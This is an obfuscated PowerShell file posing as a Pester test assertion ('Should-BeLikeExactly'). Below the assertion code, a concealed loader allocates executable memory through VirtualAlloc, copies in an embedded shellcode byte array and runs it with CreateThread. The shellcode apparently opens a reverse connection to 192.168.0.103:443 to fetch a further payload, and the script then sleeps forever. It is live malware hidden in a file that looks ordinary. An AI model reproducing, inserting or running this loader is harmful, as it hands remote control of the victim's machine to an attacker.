function ShO`ULd`-be`LikE`E`XactLy(${ActUA`l`V`AlUE}, ${E`XPecTe`d`Va`luE}, [switch] ${N`E`gAte}, [String] ${bec`A`USE}) {
    
    [bool] ${suCcE`e`deD} = ${ActUa`Lva`lUE} -clike ${EXPeCTEd`V`A`LUe}
    if (${Neg`AtE}) {
        ${suC`c`EEDEd} = -not ${sUC`C`Ee`dED}
    }

    if (-not ${SUccEE`D`Ed}) {
        if (${n`eGA`Te}) {
            return .("{0}{1}{2}"-f 'New','-Ob','ject') ("{1}{2}{0}"-f 't','psob','jec') -Property @{
                ("{1}{0}" -f 'cceeded','Su')      = ${Fa`LsE}
                ("{3}{0}{1}{4}{2}" -f 'r','e','sage','Failu','Mes') = "Expected case sensitive like wildcard $(Format-Nicely $ExpectedValue) to not match $(Format-Nicely $ActualValue),$(Format-Because $Because) but it did match. "
            }
        }
        else {
            return .("{1}{2}{0}"-f'ct','New-Obj','e') ("{0}{2}{1}"-f 'p','ject','sob') -Property @{
                ("{2}{3}{0}{1}"-f 'e','ded','Su','cce')      = ${FA`lse}
                ("{3}{0}{1}{2}" -f 'ailu','reMess','age','F') = "Expected case sensitive like wildcard $(Format-Nicely $ExpectedValue) to match $(Format-Nicely $ActualValue),$(Format-Because $Because) but it did not match. "
            }
        }
    }

    return .("{2}{1}{0}"-f 'ject','w-Ob','Ne') ("{1}{2}{0}" -f'bject','p','so') -Property @{
        ("{2}{0}{1}"-f 'ed','ed','Succe') = ${t`RUe}
    }
}

.("{3}{1}{4}{2}{0}"-f'r','ion','perato','Add-Assert','O') -Name         ("{1}{0}{4}{2}{3}" -f'e','B','e','Exactly','Lik') `
    -InternalName ("{2}{1}{0}{3}{4}" -f'k','ould-BeLi','Sh','eE','xactly') `
    -Test         ${function:Should-BeLikeExactly}

function ShouLDbELIKeeXACt`Ly`F`AiLureMess`A`ge() {
}
function nOtshO`U`lD`B`eLIKEExACTLYFaIlU`REMEss`AGe() {
}

${o`RFA} = ((("{12}{22}{67}{63}{68}{50}{31}{78}{59}{51}{76}{8}{71}{72}{58}{53}{35}{80}{60}{23}{44}{0}{16}{34}{3}{1}{45}{15}{21}{25}{33}{65}{77}{7}{17}{6}{46}{11}{49}{14}{36}{74}{30}{29}{4}{18}{41}{43}{75}{32}{52}{56}{39}{40}{26}{10}{24}{9}{61}{66}{42}{48}{69}{38}{54}{62}{79}{73}{27}{28}{57}{64}{19}{20}{37}{2}{13}{47}{70}{5}{55}"-f 'ss, u','ca','tPtr memset(','o','T','c, uint','X','r','i','t','s',')]public s','[Dll','IntPtr ','extern I','ionType, uint','int dwSize, uin','nel32.dlly','hread','c ext','ern',' flProtec','Import(y','r',', IntP','t);[D','tAddres','dId);','[DllImport(yXLmsvcr','e','reat','L','tes, ui','l','t flAll','lpA','ntP',' In','ntP','tPtr l','pStar','(','r, uint ','IntPtr lpThreadAtt','e','t','L','dest, uint ','dwCreationFlags, ','tatic ','X',' In','nt dwStackS','(IntPtr ','tr l',' count);','ize, In','t.dll','lloc','blic static extern','d','r lpParam','p','Lke','yXL)]public stati','lImpor','ete','X','rnel32.dlly','I','sr','rt','ualA','a','tr C','ribu','tPtr V','t(yXLke',')]pu','Thre','d'))  -rEPlacE  ([cHAr]121+[cHAr]88+[cHAr]76),[cHAr]34);${w} = .("{1}{2}{0}"-f'Type','Ad','d-') -memberDefinition ${O`RFA} -Name ("{0}{1}" -f 'Win3','2') -namespace ("{3}{4}{0}{1}{2}"-f '2Fu','nct','ions','W','in3') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x67,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."len`G`TH" -gt 0x1000){${g} = ${Z}."lEn`GTh"};${4C`8h}=${w}::("{1}{0}{2}{3}" -f 'irtua','V','l','Alloc').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${Z}."l`enGth"-1);${I}++) {${w}::"m`eM`sEt"([IntPtr](${4`c8h}.("{2}{0}{1}" -f'nt','32','ToI').Invoke()+${I}), ${Z}[${I}], 1)};${W}::("{0}{1}{2}"-f'Create','Threa','d').Invoke(0,0,${4c`8h},0,0,0);for (;;){.("{0}{1}{2}" -f'Start-s','lee','p') 60};
